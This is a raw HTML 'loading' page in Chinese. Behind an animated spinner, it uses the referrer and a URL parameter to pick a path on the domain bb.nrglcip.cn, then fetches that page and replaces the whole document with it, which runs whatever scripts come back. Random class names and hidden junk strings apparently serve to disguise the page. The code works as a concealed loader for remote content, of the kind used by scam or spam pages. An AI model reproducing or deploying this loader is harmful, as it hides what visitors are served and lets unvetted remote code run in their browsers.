<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RjLTsmfOR4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RjLTsmfOR4 .kCwC8boUR0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RjLTsmfOR4 .content {
            line-height: 50px;
            text-align: center
        }

        .RjLTsmfOR4 .img {
            width: 100%
        }

        .RjLTsmfOR4 .oDEEE1or {
            text-align: center
        }

        .RjLTsmfOR4 .oDEEE1or span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RjLTsmfOR4 .oDEEE1or span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RjLTsmfOR4 .oDEEE1or span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RjLTsmfOR4 .oDEEE1or span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RjLTsmfOR4 .oDEEE1or span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RjLTsmfOR4 .oDEEE1or span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RjLTsmfOR4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vQX26zPbfR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bJZVHO = vQX26zPbfR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bJZVHO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bJZVHO +".html?a=share";
		}
		
        E8NiXY=url+"#"+new Date().getTime();
        E8NiXY && function() {
            $.get(E8NiXY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>NB6WaYcGJSecp5gU</span>
<div style='display:none'>AmnsRordVSdr7OnxuQ8m0g5OYPDikwRiz2G27kP31CiJFxz5yUpb7h</div>
<b style='display:none' >l1COhke52P6oP3RbJJwHt</b><div class="RjLTsmfOR4">
    <div class="kCwC8boUR0">
        <div class="oDEEE1or">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>eILu0gYp9OJUeJzlypGwqmfZ7</p>
<ul style='display:none' >KpltVuBDU2o7MBwBGE1bghHSlH7ahqY8qmAlyT3YwVNa0nUyAC99kSWrNeGxNB0S1uExjmhleHNkaORZ2YRzrjDrlswNvcsNuc6w</ul>
<img  src='' style='display:none'></body>
</html>